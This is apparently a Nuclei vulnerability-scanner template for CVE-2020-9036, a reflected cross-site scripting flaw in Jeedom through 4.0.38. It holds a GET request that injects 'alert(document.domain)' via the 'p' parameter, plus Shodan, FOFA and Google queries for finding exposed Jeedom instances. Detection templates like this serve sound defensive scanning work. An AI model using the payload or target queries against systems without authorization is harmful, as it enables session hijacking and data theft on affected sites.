id: CVE-2020-9036 info: name: Jeedom <=4.0.38 - Cross-Site Scripting author: pikpikcu severity: medium description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/my3ker/my3ker-cve-workshop classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-9036 cwe-id: CWE-79 epss-score: 0.00113 epss-percentile: 0.43845 cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeedom product: jeedom shodan-query: http.title:"jeedom" fofa-query: title="jeedom" google-query: intitle:"jeedom" tags: cve,cve2020,xss,jeedom http: - method: GET path: - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100a9cdb256a23fb29cc79afc92af5dfdf974dcc90897da1ac609b1c0135de3c1d9022100d7c106bcf1829aaa0b27e01b7f64812a31aa7464778b826cfc3d965839e42438:922c64590222798bb761d5b6d8e72950